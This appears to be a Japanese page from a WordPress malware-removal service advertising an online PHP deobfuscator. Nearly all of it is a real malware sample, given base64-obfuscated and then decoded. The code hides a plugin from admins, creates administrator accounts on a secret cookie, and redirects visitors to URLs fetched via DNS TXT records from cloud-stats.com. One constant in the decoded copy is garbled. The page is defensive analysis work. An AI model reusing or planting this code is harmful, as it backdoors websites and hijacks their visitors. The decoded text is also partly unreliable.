Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $c2017921717=base64_decode('YTkwNjlkOGViOTFmNWExZGNmZTlkZWQ1NjM1NzJkZDU=');if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&&!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET)){add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg==');echo base64_decode('I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9');echo base64_decode('I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('PC9zdHlsZT4=');});add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($p3968202353){unset($p3968202353[base64_decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]);return $p3968202353;});}if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0);ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);function _gcookie($c2013832146){return(isset($_COOKIE[$c2013832146]))?base64_decode($_COOKIE[$c2013832146]):'';}if(!empty($c2017921717)&&_gcookie(base64_decode('cHc='))===$c2017921717){switch(_gcookie(base64_decode('Yw=='))){case base64_decode('c2Q='):$u2564639436=_gcookie(base64_decode('ZA=='));if(strpos($u2564639436,base64_decode('Lg=='))>0){update_option(base64_decode('ZA=='),$u2564639436);}break;case base64_decode('YXU='):$m4067256894=_gcookie(base64_decode('dQ=='));$y2181537457=_gcookie(base64_decode('cA=='));$r4024072794=_gcookie(base64_decode('ZQ=='));if($m4067256894&&$y2181537457&&$r4024072794&&!username_exists($m4067256894)){$b2809058197=wp_create_user($m4067256894,$y2181537457,$r4024072794);$t2375276105=new WP_User($b2809058197);$t2375276105->set_role(base64_decode('YWRtaW5pc3RyYXRvcg=='));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode('U0NSSVBUX05BTUU=')])!==false){return;}if(_gcookie(base64_decode('c2tpcA=='))===base64_decode('MQ==')){return;}function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p'),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _is_iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _user_ip(){foreach(array(base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ'),base64_decode('SFRUUF9DTElFTlRfSVA='),base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='),base64_decode('SFRUUF9YX0ZPUldBUkRFRA=='),base64_decode('SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ'),base64_decode('SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI='))as $k2324736937){if(array_key_exists($k2324736937,$_SERVER)&&!empty($_SERVER[$k2324736937])){foreach(explode(base64_decode('LA=='),$_SERVER[$k2324736937])as $j2783163181){$j2783163181=trim($j2783163181);if(filter_var($j2783163181,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $j2783163181;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$j2783163181=_user_ip();if(!$j2783163181){return;}$w113136155=get_transient(base64_decode('ZXhw'));if(!is_array($w113136155)){$w113136155=array();}foreach($w113136155 as $t140662621=>$g1801730948){if(time()-$g1801730948>86400){unset($w113136155[$t140662621]);}}if(key_exists($j2783163181,$w113136155)&&(time()-$w113136155[$j2783163181]<86400)){return;}$y3475444733=filter_var(parse_url(base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$l1584689357=str_replace(base64_decode('Og=='),base64_decode('LQ=='),$j2783163181);$l1584689357=str_replace(base64_decode('Lg=='),base64_decode('LQ=='),$l1584689357);$l2439710439=base64_decode('Y2xvdWQtc3RhdHMuY29t');$e252678980=get_option(base64_decode('ZA=='));if($e252678980&&strpos($e252678980,base64_decode('Lg=='))>0){$l2439710439=$e252678980;}$f3775001192=_is_iphone()?base64_decode('aQ=='):base64_decode('bQ==');$s2545728356=(!$y3475444733?base64_decode('dW5rLmNvbQ=='):$y3475444733).base64_decode('Lg==').(!$l1584689357?base64_decode('MC0wLTAtMA=='):$l1584689357).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg==').(_is_mobile()?base64_decode('bg==').$f3775001192:base64_decode('bmQ=')).base64_decode('Lg==').$l2439710439;$q453955339=@dns_get_record($s2545728356,DNS_TXT);if(is_array($q453955339)&&!empty($q453955339)){if(isset($q453955339[0][base64_decode('dHh0')])){$q453955339=$q453955339[0][base64_decode('dHh0')];$q453955339=base64_decode($q453955339);if($q453955339==base64_decode('ZXJy')){$w113136155[$j2783163181]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$w113136155);}else if(substr($q453955339,0,4)===base64_decode('aHR0cA==')){$w113136155[$j2783163181]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$w113136155);wp_redirect($q453955339);exit;}}}}add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));} ?>
<?php $c2017921717 = "a9069d8eb91f5a1dcfe9ded563572dd5"; if (current_user_can("administrator") && !array_key_exists("show_all", $_GET)) { add_action("admin_print_scripts", function () { echo "<style>"; echo "#toplevel_page_wpcode { display: none; }"; echo "#wp-admin-bar-wpcode-admin-bar-info { display: none; }"; echo "#wpcode-notice-global-review_request { display: none; }"; echo "</style>"; }); add_filter("all_plugins", function ($p3968202353) { unset($p3968202353["insert-headers-and-footers/ihaf.php"]); return $p3968202353; }); } if (!function_exists("_red")) { error_reporting(0); ini_set("display_errors", 0); function _gcookie($c2013832146) { return isset($_COOKIE[$c2013832146]) ? base64_decode($_COOKIE[$c2013832146]) : ''; } if (!empty($c2017921717) && _gcookie("pw") === $c2017921717) { switch (_gcookie("c")) { case "sd": $u2564639436 = _gcookie("d"); if (strpos($u2564639436, ".") > 0) { update_option("d", $u2564639436); } break; case "au": $m4067256894 = _gcookie("u"); $y2181537457 = _gcookie("p"); $r4024072794 = _gcookie("e"); if ($m4067256894 && $y2181537457 && $r4024072794 && !username_exists($m4067256894)) { $b2809058197 = wp_create_user($m4067256894, $y2181537457, $r4024072794); $t2375276105 = new WP_User($b2809058197); $t2375276105->set_role("administrator"); } break; } return; } if (stripos(wp_login_url(), $_SERVER["SCRIPT_NAME"]) !== false) { return; } if (_gcookie("skip") === "1") { return; } function _is_mobile() { return preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up.browser|up.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]); } function _is_iphone() { return preg_match("/(iphone|ipod)/i", $_SERVER["HTTP_USER_AGENT"]); } function _user_ip() { foreach (array("HTTP_CF_CONNECTING_IP", "HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR") as $k2324736937) { if (array_key_exists($k2324736937, $_SERVER) && !empty($_SERVER[$k2324736937])) { foreach (explode(",", $_SERVER[$k2324736937]) as $j2783163181) { $j2783163181 = trim($j2783163181); if (filter_var($j2783163181, FILTER_VALIDATE_IP, "FILTER_FLAG_NO_RW[__SOOGE") !== false) { return $j2783163181; } } } } return false; } function _red() { if (is_user_logged_in()) { return; } $j2783163181 = _user_ip(); if (!$j2783163181) { return; } $w113136155 = get_transient("exp"); if (!is_array($w113136155)) { $w113136155 = array(); } foreach ($w113136155 as $t140662621 => $g1801730948) { if (time() - $g1801730948 > 86400) { unset($w113136155[$t140662621]); } } if (key_exists($j2783163181, $w113136155) && time() - $w113136155[$j2783163181] < 86400) { return; } $y3475444733 = filter_var(parse_url("https://" . $_SERVER["HTTP_HOST"], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME); $l1584689357 = str_replace(":", "-", $j2783163181); $l1584689357 = str_replace(".", "-", $l1584689357); $l2439710439 = "cloud-stats.com"; $e252678980 = get_option("d"); if ($e252678980 && strpos($e252678980, ".") > 0) { $l2439710439 = $e252678980; } $f3775001192 = _is_iphone() ? "i" : "m"; $s2545728356 = (!$y3475444733 ? "unk.com" : $y3475444733) . "." . (!$l1584689357 ? "0-0-0-0" : $l1584689357) . "." . mt_rand(100000, 999999) . "." . (_is_mobile() ? "n" . $f3775001192 : "nd") . "." . $l2439710439; $q453955339 = @dns_get_record($s2545728356, DNS_TXT); if (is_array($q453955339) && !empty($q453955339)) { if (isset($q453955339[0]["txt"])) { $q453955339 = $q453955339[0]["txt"]; $q453955339 = base64_decode($q453955339); if ($q453955339 == "err") { $w113136155[$j2783163181] = time(); delete_transient("exp"); set_transient("exp", $w113136155); } else { if (substr($q453955339, 0, 4) === "http") { $w113136155[$j2783163181] = time(); delete_transient("exp"); set_transient("exp", $w113136155); wp_redirect($q453955339); exit; } } } } } add_action("init", "_red"); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.